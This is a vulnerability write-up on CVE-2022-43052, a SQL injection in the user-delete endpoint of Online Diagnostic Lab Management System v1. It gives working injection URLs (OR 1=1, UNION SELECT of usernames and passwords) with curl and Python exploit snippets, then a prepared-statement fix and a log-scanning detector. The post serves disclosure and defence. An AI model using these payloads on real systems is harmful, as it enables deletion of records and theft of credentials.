CVE-2022-43052 is a critical vulnerability affecting the Online Diagnostic Lab Management System version 1.. This bug allows attackers to perform SQL injection via the id parameter found at /odlms/classes/Users.php?f=delete. In this post, we'll break down the vulnerability step by step, show example code for exploiting it, and provide helpful references for those interested in further details. If you run this software, patch or secure your instance as soon as possible—this issue can give an attacker dangerous access to your data.

Technical Details

Vulnerability summary:
A user-controlled id parameter is passed directly into an SQL query in the PHP file Users.php when deleting a user. There’s insufficient input sanitization, allowing attackers to manipulate the SQL call.

Affected software:

Online Diagnostic Lab Management System v1.

Vulnerable script and parameter:
- /odlms/classes/Users.php?f=delete (parameter: id)

How the Vulnerability Works

When an administrator (or attacker) triggers a deletion request, the PHP script takes the id value from the URL and inserts it unmodified into an SQL DELETE statement. If someone provides SQL syntax instead of a number, the database executes it as part of the query.

Example vulnerable PHP code snippet

// Users.php
if($_GET['f'] == 'delete') {
    $id = $_GET['id'];
    $sql = "DELETE FROM users WHERE id = $id";
    $result = $conn->query($sql);
}

Notice $id comes straight from user input ($_GET['id']). If a user submits malicious data in the id parameter, the database will process it.

Suppose you want to see all users in the system. An attacker could try crafting a URL like this:

http://targetsite.com/odlms/classes/Users.php?f=delete&id= OR 1=1

This modifies the SQL to:

DELETE FROM users WHERE id =  OR 1=1;

Attackers can also use UNION-based injection to extract information. For instance:

http://targetsite.com/odlms/classes/Users.php?f=delete&id= UNION SELECT 1,username,password FROM users--

Depending on error reporting and output, they may see usernames and password hashes or session data.

Here's a simple script using curl (command line) to demonstrate triggering the vulnerability:

curl "http://targetsite.com/odlms/classes/Users.php?f=delete&id=%20OR%201=1"

Python example

import requests

url = "http://targetsite.com/odlms/classes/Users.php"
params = {
    "f": "delete",
    "id": " OR 1=1"
}
response = requests.get(url, params=params)
print(response.text)

To fix

- Sanitize inputs: Always treat user data as unsafe. Cast id to an integer or use prepared statements.

Safe PHP example

$id = intval($_GET['id']);
$stmt = $conn->prepare("DELETE FROM users WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
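
To check whether an instance has already received requests like the ones shown above, the following added example (not code from the original post or from the project) scans web server access-log lines for calls to Users.php?f=delete whose id is anything other than a plain integer. It assumes the common "combined" access-log format and that id arrives in the query string, as in the snippet above; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-format access-log entry (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
ENDPOINT = "/odlms/classes/Users.php"  # path named in the advisory
PLAIN_INT = re.compile(r"[0-9]+")      # the only shape a legitimate id should have


def suspicious_delete_requests(lines):
    """Return (ip, status, decoded id) for delete calls whose id is not a plain integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        parts = urlsplit(m.group("target"))
        if parts.path != ENDPOINT:
            continue
        # parse_qs percent-decodes values; keep_blank_values keeps an empty id visible.
        query = parse_qs(parts.query, keep_blank_values=True)
        if query.get("f") != ["delete"]:
            continue
        ids = query.get("id", [])
        # Flag a missing id, a repeated id, or any id that is not digits only.
        if len(ids) != 1 or not PLAIN_INT.fullmatch(ids[0]):
            hits.append((m.group("ip"), int(m.group("status")), ids[0] if ids else None))
    return hits


# Constructed sample lines (documentation IP ranges), not taken from a real incident.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2022:20:15:00 +0000] "GET /odlms/classes/Users.php?f=delete&id=7 HTTP/1.1" 200 21 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [07/Nov/2022:20:16:41 +0000] "GET /odlms/classes/Users.php?f=delete&id=%20OR%201=1 HTTP/1.1" 200 21 "-" "curl/7.85.0"',
    '198.51.100.23 - - [07/Nov/2022:20:16:45 +0000] "GET /odlms/classes/Users.php?f=delete&id=+UNION+SELECT+1,username,password+FROM+users-- HTTP/1.1" 500 0 "-" "python-requests/2.28.1"',
    '192.0.2.10 - - [07/Nov/2022:20:17:02 +0000] "GET /odlms/classes/Users.php?f=save HTTP/1.1" 200 1 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, status, raw_id in suspicious_delete_requests(SAMPLE_LOG):
        print(f"{ip} status={status} id={raw_id!r}")
```

The same digits-only rule can be enforced at a reverse proxy or WAF in front of the application until the handler itself is fixed.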

References

- Official NVD entry
- Exploit Database (EDB-ID: 51477)
- Original disclosure on GitHub
- Mitre: CVE-2022-43052
- Basic SQL Injection explanation

Final Thoughts

CVE-2022-43052 is a simple but severe example of why unsanitized input is so risky. Attackers—sometimes even without special tools—can severely damage or compromise your lab management system just by modifying a URL. Always use prepared statements and never trust user input, especially in healthcare and diagnostic systems where data sensitivity is high.

If you use Online Diagnostic Lab Management System v1., review your system’s security as soon as possible!

Timeline

Published on: 11/07/2022 20:15:00 UTC
Last modified on: 11/08/2022 15:09:00 UTC